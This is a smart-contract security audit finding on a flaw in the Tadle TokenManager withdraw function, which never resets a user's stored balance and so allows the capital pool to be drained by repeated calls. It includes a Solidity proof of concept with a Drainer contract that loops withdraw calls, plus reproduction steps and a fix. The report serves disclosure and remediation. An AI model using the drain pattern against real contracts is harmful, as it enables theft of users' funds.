The withdraw function in the TokenManager contract does not reset the caller's entry in userTokenBalanceMap after the claimable amount has been transferred out. Because the stored balance survives the withdrawal, the same amount can be withdrawn again on every subsequent call.
Contract: TokenManager
Function: withdraw
Location: https://github.com/tadle-com/market-evm/blob/8fbea7f4513cbeb0104236927d9051510574e673/src/core/TokenManager.sol#L137
Issue: The userTokenBalanceMap entry is not reset to zero after a user withdraws their tokens. Each call to withdraw reads the unchanged claimable amount and transfers it again, so the same balance can be withdrawn as many times as the pool's funds allow.
Because withdraw never decrements the stored balance, any user with a non-zero claimable amount can call it repeatedly and pull that amount from the capital pool on every call, draining tokens that belong to other users. This causes direct financial loss and breaks the accounting integrity of the contract.
Tools Used: Manual code review
Suggested Fix: Add a line to the withdraw function that resets the caller's userTokenBalanceMap entry to zero, placed before the tokens are transferred out of the capital pool (state update first, external call second).

This ensures that the user's balance is correctly updated as part of the withdrawal, so the same balance cannot be withdrawn more than once.
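A minimal, hypothetical model of the vulnerable and corrected withdraw paths, added here as an illustration. This is not the Tadle TokenManager or CapitalPool code: the contract names, the MockToken and MockPool helpers, the Drainer contract, the addBalance setter and the simplified two-level userTokenBalanceMap (the balance-type dimension is dropped) are all assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical, simplified model of the withdraw path (not the project's code).

// Minimal ERC20 subset: just enough for transferFrom out of the pool to work.
contract MockToken {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    function mint(address to, uint256 amount) external {
        balanceOf[to] += amount;
    }

    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        return true;
    }

    function transferFrom(address from, address to, uint256 amount) external returns (bool) {
        require(balanceOf[from] >= amount, "insufficient balance");
        require(allowance[from][msg.sender] >= amount, "insufficient allowance");
        allowance[from][msg.sender] -= amount;
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }
}

// Stand-in for the capital pool: it holds the tokens and has approved the
// manager to pull them (the approval precondition the judge's note refers to).
contract MockPool {
    function approveManager(address token, address manager) external {
        MockToken(token).approve(manager, type(uint256).max);
    }
}

abstract contract TokenManagerBase {
    // user => token => claimable amount (stands in for userTokenBalanceMap)
    mapping(address => mapping(address => uint256)) public userTokenBalanceMap;
    address public immutable capitalPool;

    constructor(address _capitalPool) {
        capitalPool = _capitalPool;
    }

    // Elsewhere in a real protocol the claim is credited by business logic;
    // modelled here as a plain setter (assumption for the example).
    function addBalance(address user, address token, uint256 amount) external {
        userTokenBalanceMap[user][token] += amount;
    }

    function withdraw(address token) external virtual;
}

// The bug: the claimable amount is read and paid out but never cleared, so every
// further call to withdraw pays the same amount again until the pool is empty.
contract VulnerableTokenManager is TokenManagerBase {
    constructor(address _capitalPool) TokenManagerBase(_capitalPool) {}

    function withdraw(address token) external override {
        uint256 claimAbleAmount = userTokenBalanceMap[msg.sender][token];
        if (claimAbleAmount == 0) return;
        // userTokenBalanceMap[msg.sender][token] still equals claimAbleAmount after this.
        require(MockToken(token).transferFrom(capitalPool, msg.sender, claimAbleAmount), "transfer failed");
    }
}

// The fix: zero the entry before the external transfer (checks-effects-interactions),
// so a repeat call, or a reentrant call during the transfer, finds nothing to claim.
contract FixedTokenManager is TokenManagerBase {
    constructor(address _capitalPool) TokenManagerBase(_capitalPool) {}

    function withdraw(address token) external override {
        uint256 claimAbleAmount = userTokenBalanceMap[msg.sender][token];
        if (claimAbleAmount == 0) return;
        userTokenBalanceMap[msg.sender][token] = 0;
        require(MockToken(token).transferFrom(capitalPool, msg.sender, claimAbleAmount), "transfer failed");
    }
}

// Attacker helper: calls withdraw repeatedly from the same address.
contract Drainer {
    function drain(TokenManagerBase manager, address token, uint256 rounds) external {
        for (uint256 i = 0; i < rounds; i++) {
            manager.withdraw(token);
        }
    }
}
```

To reproduce in Remix or a Foundry script: deploy MockToken, MockPool, Drainer and VulnerableTokenManager(pool); mint 1,000 tokens to the pool, call pool.approveManager(token, manager), credit the attacker with manager.addBalance(address(drainer), token, 100), then call drainer.drain(manager, token, 10). The Drainer ends up holding all 1,000 tokens and the pool is empty. Repeating the same steps against FixedTokenManager pays out 100 on the first call and nothing afterwards, because the entry is zeroed before the transfer.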
Valid critical severity finding: the lack of clearance of the `userTokenBalanceMap` mapping allows complete draining of the CapitalPool contract. Note: this would require the approval issues highlighted in other issues to be fixed first (i.e. the wrong approval address within `_transfer` and the lack of approvals within `_safe_transfer_from` during ERC20 withdrawals).